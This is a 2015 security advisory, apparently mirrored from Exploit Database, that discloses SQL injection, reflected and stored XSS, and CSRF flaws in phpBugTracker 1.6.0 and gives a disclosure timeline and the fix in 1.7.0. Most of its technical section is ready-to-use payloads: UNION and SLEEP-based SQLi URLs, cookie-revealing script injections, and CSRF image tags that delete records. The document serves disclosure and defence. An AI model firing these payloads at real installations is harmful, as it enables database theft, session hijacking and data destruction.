phpBugTracker 1.6.0 – Multiple Vulnerabilities

• Exploit Database
• 36 阅读

• 作者： Steffen Rösemann
  日期： 2015-02-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36160/

• Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in
  phpBugTracker v.1.6.0
  Advisory ID: SROEADV-2015-16
  Author: Steffen Rösemann
  Affected Software: phpBugTracker v.1.6.0
  Vendor URL: https://github.com/a-v-k/phpBugTracker
  Vendor Status: patched
  CVE-ID: will asked to be assigned after release on FullDisclosure via
  OSS-list
  Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31
  
  ==========================
  Vulnerability Description:
  ==========================
  
  The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,
  stored/reflected XSS- and CSRF-vulnerabilities.
  
  ==================
  Technical Details:
  ==================
  
  The following files used in a common phpBugTracker installation suffer from
  different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:
  
  ===========
  project.php
  ===========
  
  SQL injection / underlaying CSRF vulnerabilityin project.php via id
  parameter:
  
  http://
  {TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+
  
  Stored XSS via input field "project name":
  
  http://{TARGET}/admin/project.php?op=add
  
  executed in: e.g. http://{TARGET}/admin/project.php, http://
  {TARGET}/index.php
  
  
  ========
  user.php
  ========
  
  Reflecting XSS in user.php via use_js parameter:
  
  http://
  {TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1
  
  executed in: same page
  
  
  =========
  group.php
  =========
  
  Reflecting XSS in group.php via use_js parameter:
  
  http://
  {TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1
  
  executed in: same page
  
  (Blind) SQL Injection / underlaying CSRF vulnerabilityin group.php via
  group_id parameter (used in different operations):
  
  http://
  {TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
  http://
  {TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+
  
  
  ==========
  status.php
  ==========
  
  SQL injection / underlaying CSRF vulnerabilityin status.php via status_id
  parameter:
  
  http://
  {TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
  
  Stored XSS via input field "Description":
  
  http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0
  
  executed in: e.g. http://{TARGET}/admin/status.php
  
  CSRF vulnerability in status.php (delete statuses):
  
  <img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"
  
  
  
  ==============
  resolution.php
  ==============
  
  SQL injection / underlaying CSRF vulnerabilityin resolution.php via
  resolution_id parameter:
  
  http://
  {TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
  
  CSRF vulnerability in resolution.php (delete resolutions):
  
  <img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"
  
  
  
  ============
  severity.php
  ============
  
  SQL injection / underlaying CSRF vulnerabilityin severity.php via
  severity_id parameter:
  
  http://
  {TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
  
  CSRF vulnerability in severity.php (delete severities):
  
  <img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"
  
  
  Stored XSS in severity.php via input field "Description":
  
  http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0
  
  executed in: e.g. http://{TARGET}/admin/severity.php
  
  
  ============
  priority.php
  ============
  
  SQL injection / underlaying CSRF vulnerability in priority.php via
  priority_id parameter:
  
  http://
  {TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+
  
  
  ======
  os.php
  ======
  
  SQL Injection / underlaying CSRF vulnerability in os.php via os_id
  parameter:
  
  http://
  {TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
  
  CSRF vulnerability in os.php (delete operating systems):
  
  <img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >
  
  Stored XSS vulnerability in os.php via input field "Regex":
  
  http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0
  
  executed in: e.g. http://{TARGET}/admin/os.php?
  
  
  ============
  database.php
  ============
  
  SQL injection / underlaying CSRF vulnerability in database.php via
  database_id:
  
  http://
  {TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+
  
  CSRF vulnerability in database.php (delete databases):
  
  <img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"
  
  
  Stored XSS vulnerability in database.php via input field "Name":
  
  http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0
  
  
  ========
  site.php
  ========
  
  CSRF vulnerability in site.php (delete sites):
  
  <img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >
  
  SQL injection / underlaying CSRF vulnerability in site.php via site_id
  parameter:
  
  http://
  {TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+
  
  
  =======
  bug.php
  =======
  
  This issue has already been assigned CVE-2004-1519, but seems to have not
  been corrected since the assignment:
  
  SQL injection / underlaying CSRF vulnerability in bug.php via project
  parameter:
  
  http://
  {TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+
  
  For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.
  
  
  
  =========
  Solution:
  =========
  
  Update to version 1.7.0.
  
  
  ====================
  Disclosure Timeline:
  ====================
  03/05-Feb-2015 – found the vulnerabilities
  05-Feb-2015 - informed the developers (see [3])
  05-Feb-2015 – release date of this security advisory [without technical
  details]
  05-Feb-2015 - forked the Github repository, to keep it available for other
  security researchers (see [4])
  05/06-Feb-2015 - vendor replied, will provide a patch for the
  vulnerabilities
  09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical
  details will be released on 19th February 2015
  19-Feb-2015 - release date of this security advisory
  19-Feb-2015 - send to FullDisclosure
  
  
  ========
  Credits:
  ========
  
  Vulnerabilities found and advisory written by Steffen Rösemann.
  
  ===========
  References:
  ===========
  
  [1] https://github.com/a-v-k/phpBugTracker
  [2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
  [3] https://github.com/a-v-k/phpBugTracker/issues/4
  [4] https://github.com/sroesemann/phpBugTracker